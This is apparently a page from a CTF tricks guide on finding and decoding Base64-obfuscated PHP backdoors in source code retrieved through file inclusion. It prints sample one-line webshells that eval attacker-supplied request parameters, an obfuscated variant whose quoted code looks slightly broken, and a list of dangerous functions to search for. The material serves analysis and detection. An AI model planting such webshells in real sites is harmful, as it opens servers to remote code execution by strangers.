> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/vulnerability-discovery/source-code-analysis/trick-0335.md).

# Code Analysis and Decoding for RCE

***

Analyze retrieved source code (e.g., from LFI) for obfuscated strings. A common technique is finding Base64 encoded strings.

Decode the found Base64 string. This can be done with tools like CyberChef or command-line utilities:

```bash
echo "BASE64_STRING" | base64 -d
```

After decoding, you may need to unescape characters (e.g., URL decoding, PHP string unescaping) depending on the original obfuscation layers. This process can reveal hidden code, such as backdoors. For example, decoding might reveal code that accepts commands via a URL parameter like `cmd` on a specific page (`/wp-admin/index.php`), allowing Remote Code Execution.

Often, the decoded string will reveal PHP code. Simple examples of what might be found include:

```php
<?php eval(base64_decode($_REQUEST['cmd'])); ?>
```

or

```php
<?php eval(base64_decode($_POST[pass])); ?>
```

More complex obfuscation might involve multiple layers or functions. For instance, a Base64 string might decode into code that itself performs further deobfuscation and execution. Consider a Base64 string that decodes to:

```php
if(!isset($_GET['cWtD']))exit();$c& $f_$(str_replace("preg_replace", "", $_GET['cWtD']));
```

In the original source code, variables like `$c` and `$f_$` might be defined earlier, for example, `$c = 'eval';` and `$f_ = 'base64_decode';`. The decoded code then effectively becomes `eval(base64_decode(str_replace("preg_replace", "", $_GET['cWtD'])))`, demonstrating a nested deobfuscation technique using `str_replace` to hide the execution flow before the final `base64_decode` and `eval`.

Identifying the final payload often involves recognizing dangerous functions commonly used in webshells and backdoors. Look for functions such as `eval`, `system`, `exec`, `passthru`, `shell_exec`, `assert`, `preg_replace` with the `/e` modifier, `create_function`, and `unserialize`. The presence of these functions, especially with arguments derived from user input (`$_GET`, `$_POST`, `$_REQUEST`, `$_COOKIE`), is a strong indicator of malicious code intended for Remote Code Execution.
